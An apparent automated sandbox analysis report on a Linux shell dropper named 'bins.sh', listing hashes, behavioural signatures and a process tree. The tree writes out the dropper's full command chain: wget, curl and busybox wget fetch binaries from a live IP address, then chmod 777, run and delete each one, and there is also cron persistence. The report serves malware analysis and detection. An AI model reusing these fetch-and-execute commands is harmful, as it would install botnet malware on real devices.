Analysis
-
max time kernel
149s -
max time network
135s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28-10-2024 06:43
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
64720a9ea75f4d4f76e6f329663cda1e
-
SHA1
6c72c54832e65dcc41c2eb6e80e88c4a693a3d1b
-
SHA256
aaa88dcb8ec822f62303b714fcfce67aaa1a41ec6d64f4d07b30ae5ace63551c
-
SHA512
22d3d662b7452755e95392ad678e4cc68eb6a0e8b7bde0f70ac83388add270a64f2ec26c8376465c863135797f248af7a8871bca0ccb1e817703bafc710eed47
-
SSDEEP
96:8B5XOnoEWWbaPOfYQGXTuEWWbaz4jQG9pTv9XY45wVNAnU1:8HXOnoEWWbaPOfYQGX9WWbaNGPbc2n8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 719 chmod 818 chmod 853 chmod 753 chmod 811 chmod 873 chmod 956 chmod 742 chmod 804 chmod 860 chmod 898 chmod 687 chmod 879 chmod 891 chmod 919 chmod 926 chmod 839 chmod 912 chmod 933 chmod 941 chmod 797 chmod 847 chmod 905 chmod 833 chmod 885 chmod 777 chmod 867 chmod 949 chmod -
Executes dropped EXE 28 IoCs
Processes:
20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZYOJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9UikCz9tmOI7m7fFqsqyPerBPFauKdpzNM59zO4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvAuATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7IeyrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupGEzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uvu0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qFJUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uvu0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZCHDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qFJUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZYOJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9UikCz9tmOI7m7fFqsqyPerBPFauKdpzNM59zO4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvAuATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7IeyrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjKioc pid process /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY 688 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h 720 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui 743 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z 754 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA 779 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie 798 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK 805 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG 812 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS 819 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv 834 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC 840 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 848 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF 854 HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p 861 JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 868 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS 874 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv 880 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC 886 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF 892 HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p 899 JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY 906 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h 913 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG 920 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui 927 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z 934 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA 942 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie 950 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK 957 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK -
Renames itself 1 IoCs
Processes:
EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITSpid process 820 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.eKskNF crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITScurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/3/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/23/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/825/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/826/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/870/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/923/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/846/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/851/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/972/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/980/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/90/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/651/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/954/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/20/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/605/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/42/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/968/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/13/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/325/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/865/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/969/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/836/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/866/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/903/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/918/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/939/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/974/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/15/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/827/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/978/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/18/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/603/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/608/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/680/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/850/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/985/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/19/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/151/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/161/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/653/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/660/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/889/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/8/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/11/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/346/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS -
Writes file to tmp directory 64 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetcurlcurlwgetbusyboxwgetcurlbusyboxcurlbusyboxcurlbusyboxcurlbusyboxbusyboxwgetcurlcurlbusyboxbusyboxbusyboxbusyboxwgetbusyboxcurlbusyboxcurlbusyboxcurlbusyboxcurlcurlcurlbusyboxwgetcurlbusyboxbusyboxbusyboxcurlcurlwgetcurlbusyboxcurlwgetcurlbusyboxbusyboxcurlbusyboxbusyboxcurlbusyboxbusyboxcurlcurlcurlbusyboxwgetcurlwgetbusyboxdescription ioc process File opened for modification /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z busybox File opened for modification /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie wget File opened for modification /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC curl File opened for modification /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h curl File opened for modification /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h wget File opened for modification /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA busybox File opened for modification /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG wget File opened for modification /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 curl File opened for modification /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG busybox File opened for modification /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS curl File opened for modification /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF busybox File opened for modification /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p curl File opened for modification /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG busybox File opened for modification /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv curl File opened for modification /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p busybox File opened for modification /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY busybox File opened for modification /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui wget File opened for modification /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv curl File opened for modification /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p curl File opened for modification /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p busybox File opened for modification /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 busybox File opened for modification /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie busybox File opened for modification /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h busybox File opened for modification /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA wget File opened for modification /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 busybox File opened for modification /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS curl File opened for modification /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z busybox File opened for modification /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA curl File opened for modification /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK busybox File opened for modification /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie curl File opened for modification /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui busybox File opened for modification /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY curl File opened for modification /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG curl File opened for modification /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z curl File opened for modification /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA busybox File opened for modification /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY wget File opened for modification /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h curl File opened for modification /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY busybox File opened for modification /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS busybox File opened for modification /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui busybox File opened for modification /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF curl File opened for modification /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui curl File opened for modification /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z wget File opened for modification /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG curl File opened for modification /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS busybox File opened for modification /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC curl File opened for modification /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK wget File opened for modification /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF curl File opened for modification /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC busybox File opened for modification /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h busybox File opened for modification /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie curl File opened for modification /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK busybox File opened for modification /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF busybox File opened for modification /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z curl File opened for modification /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv busybox File opened for modification /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC busybox File opened for modification /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 curl File opened for modification /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui curl File opened for modification /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY curl File opened for modification /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie busybox File opened for modification /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS wget File opened for modification /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK curl File opened for modification /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS wget File opened for modification /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:653
-
/bin/rm/bin/rm bins.sh2⤵PID:656
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Writes file to tmp directory
PID:658
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:673
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Writes file to tmp directory
PID:686
-
-
/bin/chmodchmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Executes dropped EXE
PID:688
-
-
/bin/rmrm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵PID:690
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Writes file to tmp directory
PID:691
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:704
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Writes file to tmp directory
PID:712
-
-
/bin/chmodchmod 777 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- File and Directory Permissions Modification
PID:719
-
-
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h./OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Executes dropped EXE
PID:720
-
-
/bin/rmrm OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵PID:723
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Writes file to tmp directory
PID:724
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Writes file to tmp directory
PID:738
-
-
/bin/chmodchmod 777 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui./4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Writes file to tmp directory
PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Writes file to tmp directory
PID:752
-
-
/bin/chmodchmod 777 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z./kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Writes file to tmp directory
PID:757
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Writes file to tmp directory
PID:773
-
-
/bin/chmodchmod 777 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA./O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵PID:781
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Writes file to tmp directory
PID:782
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Writes file to tmp directory
PID:794
-
-
/bin/chmodchmod 777 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie./uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵PID:800
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Writes file to tmp directory
PID:801
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Writes file to tmp directory
PID:803
-
-
/bin/chmodchmod 777 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK./yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Writes file to tmp directory
PID:808
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Writes file to tmp directory
PID:810
-
-
/bin/chmodchmod 777 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG./3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
